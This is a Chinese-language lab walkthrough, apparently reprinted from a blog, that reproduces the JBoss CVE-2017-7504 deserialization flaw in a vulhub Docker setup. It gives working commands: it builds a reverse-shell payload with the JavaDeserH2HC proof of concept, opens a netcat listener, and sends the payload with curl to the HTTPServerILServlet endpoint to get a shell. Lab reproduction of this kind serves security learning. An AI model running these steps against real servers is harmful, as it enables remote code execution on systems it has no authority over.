CVE-2017-7504 JBOSS反序列化漏洞復現


一、漏洞描述

  JBoss AS 4.x及之前版本中,JbossMQ實現過程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,遠程攻擊者可借助特制的序列化數據利用該漏洞執行任意代碼。

二、漏洞環境搭建

需要使用的工具如下

1.docker+vulhub漏洞庫
2.漏洞POC:下載鏈接https://github.com/joaomatosf/JavaDeserH2HC
3.攻擊機kali虛擬機(版本隨意)
4.靶機Ubuntu18.04虛擬機(其他也可以)

打開Ubuntu虛擬機,有docker環境和vulhub漏洞庫的話就直接進入環境,沒有的話先安裝docker和下載vulhub漏洞庫(網上教程很多,這里就不多介紹了)

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# 

執行命令

root@admin666-virtual-machine:~/vulhub-master/jboss/CVE-2017-7504# docker-compose up -d

等到出現以下頁面說明已經搭建完成

可以訪問http://your-ip:8080,出現如下頁面證明環境搭建成功!

三、漏洞利用

進入kali利用漏洞POC進行驗證

1、先把POC克隆到kali中,執行命令

git clone https://github.com/joaomatosf/JavaDeserH2HC

2、進入JavaDeserH2HC目錄,執行

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

3、設置接收shell的IP和端口

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻擊機IP:監聽端口

4、使用nc監聽端口

nc -lvvp 監聽端口

5、用攻擊機發送payload,在JavaDeserH2HC目錄下執行

curl http://192.168.1.17:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser

6、查看監聽端口返回的shell,可以執行命令,至此漏洞驗證完成


7、關閉docker環境

docker-compose down


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM